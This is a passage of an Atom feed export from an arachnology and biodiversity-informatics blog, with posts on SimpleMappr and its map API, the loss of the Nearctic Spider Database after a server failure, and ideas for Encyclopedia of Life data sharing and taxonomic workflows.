{}" href="http://www.simplemappr.net/"&gt;&lt;img style="cursor: pointer; width: 320px; height: 201px;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/TE7ksB4VJ4I/AAAAAAAAAJw/FFWZHXlVk7E/s320/Picture+1.png" alt="" id="BLOGGER_PHOTO_ID_5498583640136034178" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3405623771239598783?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3405623771239598783/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3405623771239598783' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3405623771239598783'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3405623771239598783'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/07/authentication-made-easy.html' title='Authentication Made Easy'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/TE7ksB4VJ4I/AAAAAAAAAJw/FFWZHXlVk7E/s72-c/Picture+1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5793570506778107188</id><published>2010-04-05T08:06:00.006-06:00</published><updated>2010-04-05T18:48:59.607-06:00</updated><title type='text'>SimpleMappr API</title><content type='html'>There are plenty of resources to make pushpin maps, but none that I know of have a Microsoft Excel add-on to make use of these. My ultimate goal is to make one as part of &lt;a href="http://www.simplemappr.net/"&gt;SimpleMappr&lt;/a&gt; to help streamline map creation for assembly into manuscripts. To get a little closer to this vision, I spent a half-hour making a RESTful API and the documentation may be found here: &lt;a href="http://www.simplemappr.net/#map-api"&gt;http://www.simplemappr.net/#map-api&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;For example, this URL: http://www.simplemappr.net/api/?file=http://www.simplemappr.net/api/demo.txt&amp;amp;shape=square&amp;amp;size=10&amp;amp;color=255,0,0&amp;amp;width=400&amp;amp;bbox=-130,40,-60,50&amp;amp;layers=lakes,stateprovinces&amp;amp;projection=esri:102009&lt;br /&gt;&lt;br /&gt;Gives you this:&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.simplemappr.net/api/?file=http://www.simplemappr.net/api/demo.txt&amp;amp;shape=square&amp;amp;size=10&amp;amp;color=255,0,0&amp;amp;width=400&amp;amp;bbox=-130,40,-60,50&amp;amp;layers=lakes,stateprovinces&amp;amp;projection=esri:102009" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5793570506778107188?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5793570506778107188/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5793570506778107188' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5793570506778107188'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5793570506778107188'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/04/simplemappr-api.html' title='SimpleMappr API'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-377980756496797883</id><published>2010-03-25T19:25:00.004-06:00</published><updated>2010-03-29T09:47:13.813-06:00</updated><title type='text'>Mapping Revival</title><content type='html'>One of the casualties of the death of the Nearctic Spider Database was a largely neglected, simple mapping application that permitted copy/paste of collection coordinates. The output was a b&amp;w line map with contoured dots, mostly suitable for insertion in manuscripts. Sadly deficient was the ability to have many layers, each with different pushpin style or to crop, zoom, pan or change the projection. Unbeknown to me, folks were actually using this thing. I actually made a much better application for the AMNH to help produce outputs for their PBI grant holders. So, with Norm Platnick's permission, I re-purposed some of the code.&lt;br /&gt;&lt;br /&gt;Here be SimpleMappr, &lt;a href="http://www.simplemappr.net"&gt;http://www.simplemappr.net&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.simplemappr.net"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 268px;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/S6wOnLHKazI/AAAAAAAAAJo/i61kvoB21ws/s400/Picture+3.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5452749314999348018" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There are bound to be bugs or hiccups because it's never been fully tested under load, but I throw it out here for feedback and feature requests. Please let me know what you were doing when and if you witness odd behaviour; this is a very dynamic environment. Yes, there are similar sorts of applications out there in the wilds but none to my knowledge permit this sort of facile "copy/paste/tweak/export" as fast as this one can.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-377980756496797883?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/377980756496797883/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=377980756496797883' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/377980756496797883'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/377980756496797883'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/03/mapping-revival.html' title='Mapping Revival'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/S6wOnLHKazI/AAAAAAAAAJo/i61kvoB21ws/s72-c/Picture+3.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8579012457982496150</id><published>2010-03-19T10:20:00.005-06:00</published><updated>2010-03-20T06:39:44.483-06:00</updated><title type='text'>Nearctic Spider Database Dead</title><content type='html'>With great sadness, I will no longer be serving the Nearctic Spider Database unless something remarkable happens.&lt;br /&gt;&lt;br /&gt;On March 17, 2010, the power supply sparked in my server, shorted out the motherboard and as a consequence, the hard drives seized up. While I of course have back-ups, unbeknown to me the incremental drive image for the applications portion of the server was corrupt. The latest working drive image was January 2007 - hardly useful to rebuild the server. This means I have to reconstruct the server from bare metal, which would be a significant financial hit and a significant consumption of time away from family.&lt;br /&gt;&lt;br /&gt;The &lt;a href="http://www.canadianarachnology.org"&gt;website currently serves&lt;/a&gt; a flat html page where one may download the code and data until March 31, 2010 at which time it will evaporate.&lt;br /&gt;&lt;br /&gt;I estimate it would take a solid week to re-install and iron-out the kinks. But, if it takes that long, surely it would be better to have a fool-proof system. And, in particular, one NOT dependent on Microsoft software.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_VYUFlXOCOxE/S6QpGlCuA3I/AAAAAAAAAJg/RJtAL9X6YcQ/s1600-h/banner2.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 400px; height: 39px;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/S6QpGlCuA3I/AAAAAAAAAJg/RJtAL9X6YcQ/s400/banner2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5450526642024612722" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8579012457982496150?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8579012457982496150/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8579012457982496150' title='18 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8579012457982496150'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8579012457982496150'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/03/nearctic-spider-database-dead.html' title='Nearctic Spider Database Dead'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/S6QpGlCuA3I/AAAAAAAAAJg/RJtAL9X6YcQ/s72-c/banner2.png' height='72' width='72'/><thr:total>18</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-9023003956855484107</id><published>2009-06-14T18:56:00.002-06:00</published><updated>2009-06-14T20:01:52.770-06:00</updated><title type='text'>The Community is Dead</title><content type='html'>This may not be much of a relevation to many, but is a notion that is sinking home more deeply for me of late. By "Community", I don't necessarily mean the online community, though there are hints of that as well when you think of the MySpace-&gt;Facebook-&gt;Twitter progression from all-out friend fest to ever more insular &amp; individualistic directions, I mean the taxonomic community.&lt;br /&gt;&lt;br /&gt;I lead the &lt;a href="http://www.lifedesks.org"&gt;LifeDesk&lt;/a&gt; application of the Encyclopedia of Life and have been trying to sell the notion of a taxa-centric "community" of taxonomists that have a desire to get their content online in a human and machine readable format. Banding together means the workload can be shared. i.e. you gather the images, I'll get the text, she'll get the names in order, and he'll get the bibliography, etc. etc. This is a similar approach behind the &lt;a href="http://scratchpads.eu/"&gt;Scratchpad&lt;/a&gt; philosophy. [Aside: there are apparently some who think Scratchpads and LifeDesks are duplicating efforts, but nothing could be further from the truth. Having both means choice and that is a good thing because it strengthens both our directions and is a clear signal to taxonomists that there is something behind this.] While the Scratchpad/LifeDesk community-driven focus may work in a number of situations, it is by no means the rule. Rather, the chances are much greater that taxonomists don't have a taxa-centric community of colleagues to share the workload because in fact, they may be the only one in the world working on their chosen taxa. As a result, the majority of Scratchpads and LifeDesks will be "communities" of single individuals. So, I have been thinking a little more deeply about the Scratchpad/LifeDesk direction and think I see a way forward.&lt;br /&gt;&lt;br /&gt;The clear signal from the Scratchpad/LifeDesks projects is that folks are doing primarily two things: 1) getting a biblio online, and 2) getting taxonomic names in order. These two activities are largely divorced from one another because the workflow leaves a lot to be desired. Both activities are thankless tasks to begin with regardless of the LifeDesks/Scratchpad environment, which adds further insult to the workflow. Why &lt;span style="font-style:italic;"&gt;should&lt;/span&gt; these activities be so independent from one another? Here's what the workflow ought to be:&lt;br /&gt;&lt;br /&gt;1. Upload PDF reprints&lt;br /&gt;2. Look for a DOI &amp; get the metadata from CrossRef. If none found, prompt with citation form (first check for existing paper in db to cut down on duplicates)&lt;br /&gt;3. Scan the PDFs using &lt;a href="http://code.google.com/p/taxon-name-processing/"&gt;TaxonFinder&lt;/a&gt;&lt;br /&gt;4. Present flat lists of names found in individual PDFs&lt;br /&gt;5. Drag these into &lt;a href="http://www.jstree.com/"&gt;jsTree-based&lt;/a&gt; classification manager while retaining the name-reprint link in the background&lt;br /&gt;&lt;br /&gt;This is the workflow that makes sense because when building a classification, one necessarily starts with publications, not some mythical list of names.&lt;br /&gt;&lt;br /&gt;But...&lt;br /&gt;&lt;br /&gt;Does the above make sense in a LifeDesk or a Scratchpad? It could certainly be a cool tool to help lower the bar of entry, but I seriously doubt it would get the traction in the taxonomic "community" that the tool would deserve. Rather, the application is best placed on the desktop as a rich, cross-platform app in &lt;a href="http://www.adobe.com/products/air/"&gt;Adobe Air&lt;/a&gt; or similarly facile environment to develop. Roll in some Bittorrent capabilities (ee gads!) and you have the start to a mechanism whereby reprints, names AND classifications may be shared and one could walk among the three in various ways. It would work because taxonomists need reprints and names AND there are plenty of residual names in any one reprint (i.e. of use to someone else). If cleverly constructed, reconciliation of names is an insular exercise that happens on the desktop (as it always has been) but the sharing of these reconciliation groups / biblio metadata acts to enhance the findability of reprints.&lt;br /&gt;&lt;br /&gt;Here's the challenge then. Build a service that accepts PDF reprints, finds the DOI (if present) &amp; spits back the citation metadata for the article AND all the names (dedup'd and cleaned) they contain. I don't don't need any more taxonomic intelligence than that. Give it to me in JSON and I can whip up the jsTree-based interface to help individuals build their own reconciliation groups...all linked to reprints in their store.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-9023003956855484107?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/9023003956855484107/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=9023003956855484107' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/9023003956855484107'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/9023003956855484107'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2009/06/community-is-dead.html' title='The Community is Dead'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-206757467995776003</id><published>2008-12-18T22:37:00.004-07:00</published><updated>2008-12-18T22:48:34.904-07:00</updated><title type='text'>Cooliris on Eight Legs</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_VYUFlXOCOxE/SUs03KA_eXI/AAAAAAAAAIg/U5wIXkbI20Q/s1600-h/cool.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 400px; height: 246px;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/SUs03KA_eXI/AAAAAAAAAIg/U5wIXkbI20Q/s400/cool.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5281373110208002418" /&gt;&lt;/a&gt;&lt;br /&gt;For well over a year, I have been serving MediaRSS feeds from the Nearctic Spider Database (before Yahoo and Flickr!) and I am overjoyed to see that all the big guys are jumping on this extension to RSS 2.0. One in particular that blows me away is Cooliris, a plug-in for all modern browsers that allows one to navigate MediaRSS feeds in 3D. So, if you haven't yet downloaded and installed Cooliris, you may do so &lt;a href="http://www.cooliris.com"&gt;HERE&lt;/a&gt;. Then, you're welcome to see the feed of spiders &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/ImageSearch.asp"&gt;HERE&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Maybe I better take a second look at &lt;a href="http://www.rssbus.com/"&gt;RSSBus&lt;/a&gt;...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-206757467995776003?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/206757467995776003/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=206757467995776003' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/206757467995776003'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/206757467995776003'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/12/cooliris-on-eight-legs.html' title='Cooliris on Eight Legs'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/SUs03KA_eXI/AAAAAAAAAIg/U5wIXkbI20Q/s72-c/cool.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5241590768693995557</id><published>2008-11-03T19:20:00.005-07:00</published><updated>2008-11-03T20:23:23.464-07:00</updated><title type='text'>Little E's</title><content type='html'>Because I work for the Encyclopedia of Life (EOL) and because I can tinker on the Nearctic Spider Database, I have the opportunity to try out various approaches to help mobilize data. One thing that concerns me about the current relationship between EOL and its content partners is their near 1:1 relationship. In other words, content partners that come onboard are encouraged to represent their data in one potentially massive XML document much like a Google Sitemap. More information on what EOL would like to see future content partners produce can be found &lt;a href="http://www.eol.org/content/page/help_build_eol"&gt;HERE&lt;/a&gt;. A potential outside consumer of these data will have no idea where to retrieve this XML document. Thus, the relationship between EOL and its content partners is closed. That is, until EOL releases some web services.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.canadianarachnology.org/data/spiders/1966"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 372px; height: 400px;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/SQ-4yb9mLmI/AAAAAAAAAGE/nTs15-lMTTw/s400/Graphic1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5264629666058481250" /&gt;&lt;/a&gt;So, in an effort to help expose the data structure EOL is looking for, I made a link on every one of the species pages in the Nearctic Spider Database. Upon clicking these "little e's", you can catch a glimpse of what EOL is hoping its content partners will produce. These "little e's" don't really help the relationship between EOL and its array of content partners, nor does it ease the effort on the part of content partners to make these documents, and nor does it help us at EOL. So what's the point? What it does is share what I produced for EOL. If you can parse the data behind the "little e's", you can parse the big XML "sitemap" document I made for EOL as well.&lt;br /&gt;&lt;br /&gt;The problem with sitemaps is that no one but the harvester knows where these sitemaps can be found. A Google sitemap for instance can be found in any folder on a website that shares a sitemap (but is usually in the root folder and is accessed as /sitemap.xml or /sitemap.gz). This is the same situation for EOL and its content partners; the "sitemap" can be found anywhere.&lt;br /&gt;&lt;br /&gt;To finish off the "little e" approach, each page should have a link to the EOL content partner sitemap document in which can be found links to all pages with "little e's". This would be somewhat similar to an OpenSearch document where are found instructions on how to make use of the search feed(s) available on a site. And of course, there should be a JSON option for a lighter weight option than XML.&lt;br /&gt;&lt;br /&gt;But, to make this of any use at all, we need a desktop reader like an RSS reader...something with the ability to shunt the data into the correct spot within a rich GUI-based classification (with some degree of certainty), thus forcing us to eventually develop far better online tree browsers. With all the bits described above, you'd come across a species page, click a button like an RSS feed button, download a sitemap containing a list of all species pages on the site you landed on, then browse through the content the way you want it organized.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5241590768693995557?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5241590768693995557/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5241590768693995557' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5241590768693995557'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5241590768693995557'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/11/little-es.html' title='Little E&apos;s'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/SQ-4yb9mLmI/AAAAAAAAAGE/nTs15-lMTTw/s72-c/Graphic1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1578203807162097572</id><published>2008-10-18T19:35:00.002-06:00</published><updated>2008-10-18T19:53:15.330-06:00</updated><title type='text'>Google Charts...Wow</title><content type='html'>Kevin Pfeiffer, an avid participant in the &lt;a href="http://forum.canadianarachnology.org/"&gt;Nearctic Arachnologists' Forum&lt;/a&gt;, finally got me to do something about the Flash-based charts on the species pages in the Nearctic Spider Database. While these older charts were great at the time, they've had their day. So, in light of the sparklines that Rod Page integrated into a "&lt;a href="http://iphylo.blogspot.com/2008/10/biodiversity-service-status.html"&gt;Biodiversity Service Status&lt;/a&gt;" pinger, I thought I'd take a closer look at &lt;a href="http://code.google.com/apis/chart/"&gt;Google Charts&lt;/a&gt;. Wow. The added plus for this service is the truly stellar documentation.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_VYUFlXOCOxE/SPqS0qQ3e4I/AAAAAAAAAFs/xhlijbChSb0/s1600-h/chart.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/SPqS0qQ3e4I/AAAAAAAAAFs/xhlijbChSb0/s320/chart.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5258676948304362370" /&gt;&lt;/a&gt;&lt;br /&gt;Rather than using a terribly long URL to get the PNG for the chart, I used a proxy. This way, I can pass the identifier to a local script that then grabs the image and dumps it on the page. And, I can give the chart a file name of my choosing.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1578203807162097572?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1578203807162097572/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1578203807162097572' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1578203807162097572'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1578203807162097572'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/10/google-chartswow.html' title='Google Charts...Wow'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/SPqS0qQ3e4I/AAAAAAAAAFs/xhlijbChSb0/s72-c/chart.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6308517379985296518</id><published>2008-10-12T07:57:00.003-06:00</published><updated>2008-10-12T08:49:43.751-06:00</updated><title type='text'>Long Tail of Biodiversity</title><content type='html'>At last count on the World Spider Catalog, there are 4345 species in the spider family &lt;a href="http://research.amnh.org/entomology/spiders/catalog/LINYPHIIDAE.html"&gt;Linyphiidae&lt;/a&gt;. This is second only to the jumping spiders. The latter are primarily tropical and subtropical, but linyphiids are predominantly found in the northern hemisphere, where are coincidentally found most of the world's arachnid systematists. And, of course, there's very little accessible information on most of these species either in print or on the web. A few notable exceptions are Tanasevitch's &lt;a href="http://www.andtan.newmail.ru/list/"&gt;Linypiid Spiders of the World&lt;/a&gt;, which contains flat lists of names organized in various ways and the ever popular &lt;a href="http://bugguide.net/node/view/1969"&gt;BugGuide gallery&lt;/a&gt; (few of which identified to species). There is a smattering of other resources out there, but they are all hard to find. Both the &lt;a href="http://tolweb.org/Linyphiidae"&gt;Tree of Life&lt;/a&gt; and the &lt;a href="http://www.eol.org/taxa/16098085"&gt;Encyclopedia of Life&lt;/a&gt; have the equivalent of stub pages so neither of these are particularly helpful.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_VYUFlXOCOxE/SPINCM169kI/AAAAAAAAAFk/llxI0fatOWI/s1600-h/new-1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/SPINCM169kI/AAAAAAAAAFk/llxI0fatOWI/s320/new-1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5256278046553077314" /&gt;&lt;/a&gt;&lt;br /&gt;A recent unlocking of these hidden gems is underway by &lt;a href="http://fm1.fieldmuseum.org/aa/staff_page.cgi?staff=sierwald&amp;id=629"&gt;Nina Sandlin&lt;/a&gt;, an Associate of Zoology at the Field Museum in Chicago. She has been building &lt;a href="http://picasaweb.google.com/nina.sandlin/LinEpig#"&gt;LinEpig&lt;/a&gt;, an photo gallery of linyphiid epigyna on Picasa Web Albums. Like most other online work on arachnids, LinEpig is built with love for the organisms and no budget (correct me if I'm wrong Nina!). While taking images of the epigyna, Nina graciously &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/ContributorImages.asp?Photographer=81"&gt;shared the habitus images&lt;/a&gt; with the Nearctic Spider Database. While in Chicago recently, I chatted with Nina about Picasa. While it comes close to what she wanted, it fell short in a number of areas. The most important in my opinion is findability. Sure, she can tag her images with names, but her gallery is poorly exposed on Google and other search engines. However, there are some features in Picasa that make it attractive. It is relatively easy to upload, manage, and geotag - though the latter could evidently use text boxes if one already has coordinates on hand. Most importantly, the interface is clean, responsive and uncluttered.&lt;br /&gt;&lt;br /&gt;Now the long tail...&lt;br /&gt;&lt;br /&gt;Prior to Nina's efforts, there was very little (if any) linyphiid imagery on the web, especially the specialized images of the epigyna, which are a lot more useful than the habitus images. If you've seen one linyphiid, you've pretty much seen them all (a few exceptions of course). They are remarkably similar in shape &amp; size, but their sexual characters, especially the male's, are dramatically different. The big biodiversity aggregators like the Encyclopedia of Life have positioned themselves to present low hanging fruit. That is, show the furry charismatic megafauna (or fish) because there are many resources serving this sort of content. But, why? Wouldn't it make sense to instead provide better and more useful tools for folks like Nina to create and organize content for which there is either nothing or very little available elsewhere? Let's hope that in time, &lt;a href="http://lifedesk.eol.org"&gt;LifeDesk&lt;/a&gt; will provide a ladder for consumers of content generated there to reach out to the furthest branches and leaves where are found all the curiosities. But first, it'll have to contain tools and functionality useful for folks like Nina and for others to jump in and give her a hand.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6308517379985296518?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6308517379985296518/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6308517379985296518' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6308517379985296518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6308517379985296518'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/10/long-tail-of-biodiversity.html' title='Long Tail of Biodiversity'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/SPINCM169kI/AAAAAAAAAFk/llxI0fatOWI/s72-c/new-1.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7250700314887531840</id><published>2008-07-25T18:55:00.003-06:00</published><updated>2008-07-26T00:26:12.606-06:00</updated><title type='text'>Show Me...Crab Spiders on Bark</title><content type='html'>&lt;a href="http://farm3.static.flickr.com/2297/2247720522_3f40b69687_m.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px;" 